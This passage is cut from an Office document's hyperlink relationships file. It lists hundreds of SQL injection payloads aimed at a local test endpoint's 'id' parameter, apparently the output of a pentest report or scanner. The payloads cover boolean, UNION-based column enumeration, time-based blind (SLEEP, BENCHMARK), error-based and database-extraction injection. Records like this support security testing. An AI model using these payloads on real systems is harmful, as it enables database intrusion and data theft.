Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12%23" TargetMode="External"/><Relationship Id="rId593" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20and%20(select%20substring(@@version,3,1))='X'" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14%23" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%23" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8" TargetMode="External"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%23" TargetMode="External"/><Relationship Id="rId411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--%20" TargetMode="External"/><Relationship Id="rId45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%23" TargetMode="External"/><Relationship Id="rId509" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%205%20" TargetMode="External"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15--%20" TargetMode="External"/><Relationship Id="rId495" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%201=1--%20" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2013--%20" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2024%23%20" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5)" TargetMode="External"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29" TargetMode="External"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId520" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11--%20" TargetMode="External"/><Relationship Id="rId562" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8--%20" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19" TargetMode="External"/><Relationship Id="rId422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--%20" TargetMode="External"/><Relationship Id="rId464" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))" TargetMode="External"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201--%20" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2024--%20" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14" TargetMode="External"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11%23" TargetMode="External"/><Relationship Id="rId573" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3'%20AND%20(SELECT%209105%20FROM%20(SELECT(SLEEP(5)))WTmQ)%20AND%20'Seyf'='Seyf" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--%20" TargetMode="External"/><Relationship Id="rId43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--%20" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%204%23%20" TargetMode="External"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%23" TargetMode="External"/><Relationship Id="rId500" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21" TargetMode="External"/><Relationship Id="rId584" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%203409=3409%20AND%20('pytW'%20LIKE%20'pytY" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%201=1" TargetMode="External"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--%20" TargetMode="External"/><Relationship Id="rId444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))%23" TargetMode="External"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%23" TargetMode="External"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6--%20" TargetMode="External"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20USER(),SLEEP(5)--%20" TargetMode="External"/><Relationship Id="rId511" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2--%20" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2015%23%20" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A'))" TargetMode="External"/><Relationship Id="rId595" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20and%20(select%20substring(@@version,3,1))='c'" TargetMode="External"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10" TargetMode="External"/><Relationship Id="rId45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%23" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%20x=x--%20" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%207%20" TargetMode="External"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--%20" TargetMode="External"/><Relationship Id="rId522" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13--%20" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2026%23%20" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15" TargetMode="External"/><Relationship Id="rId399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21" TargetMode="External"/><Relationship Id="rId466" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%201=0--%20" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2018%20" TargetMode="External"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--%20" TargetMode="External"/><Relationship Id="rId533" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--%20" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26" TargetMode="External"/><Relationship Id="rId477" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="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" TargetMode="External"/><Relationship Id="rId600" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%25'%20AND%208310=8311%20AND%20'%25'='" TargetMode="External"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20WHERE%201=1%20AND%201=1" TargetMode="External"/><Relationship Id="rId544" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5%23" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7%23" TargetMode="External"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))--%20" TargetMode="External"/><Relationship Id="rId40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--%20" TargetMode="External"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12" TargetMode="External"/><Relationship Id="rId488" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%206--%20" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%209%20" TargetMode="External"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22" TargetMode="External"/><Relationship Id="rId555" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17%23" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%20SLEEP(5)--%20" TargetMode="External"/><Relationship Id="rId41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,NULL--%20" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23" TargetMode="External"/><Relationship Id="rId499" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,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9999/category/view?id=%27%20UNION%20ALL%20SELECT%2067,CONCAT(0x0a,database(),0x0a),67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67--%20-" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=-5703%27%20UNION%20ALL%20SELECT%2067,CONCAT(0x7162716b71,0x706a6e686868707941774a4f467a6f794e4d6773597173727a75566868625a6d43754f4772684552,0x716b717a71),67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67--%20-" TargetMode="External"/><Relationship Id="rId7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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3'%20AnD%20SLEEP(5)%20ANd%20'1" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3';SELECT%20SLEEP(5)%23" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%27%20AND%205584=5584%20AND%20%27fkel%27=%27fkel" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3'%20AND%20(SELECT%209105%20FROM%20(SELECT(SLEEP(5)))WTmQ)%20AND%20'Seyf'='Sey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9999/category/view?id=3%20ORDER%20BY%2016%20" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%201=0" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4--%20" TargetMode="External"/><Relationship Id="rId531" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5)" TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8" TargetMode="External"/><Relationship Id="rId47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%23" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AS%20INJECTX%20WHERE%201=1%20AND%201=1--" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2027%20" TargetMode="External"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15--%20" TargetMode="External"/><Relationship Id="rId542" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11--%20" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14" TargetMode="External"/><Relationship Id="rId402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%23" TargetMode="External"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19" TargetMode="External"/><Relationship Id="rId486" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%204--%20" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3or%20pg_SLEEP(5)%23" TargetMode="External"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--%20" TargetMode="External"/><Relationship Id="rId553" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--%20" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8%23" TargetMode="External"/><Relationship Id="rId413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL--%20" TargetMode="External"/><Relationship Id="rId49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" TargetMode="External"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2015--%20" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%23" TargetMode="External"/><Relationship Id="rId564" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3%23" TargetMode="External"/><Relationship Id="rId424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2026--%20" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2029%20" TargetMode="External"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20" TargetMode="External"/><Relationship Id="rId575" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14%23" TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23" TargetMode="External"/><Relationship Id="rId43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--%20" TargetMode="External"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21" TargetMode="External"/><Relationship Id="rId502" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX'" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%206%23%20" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 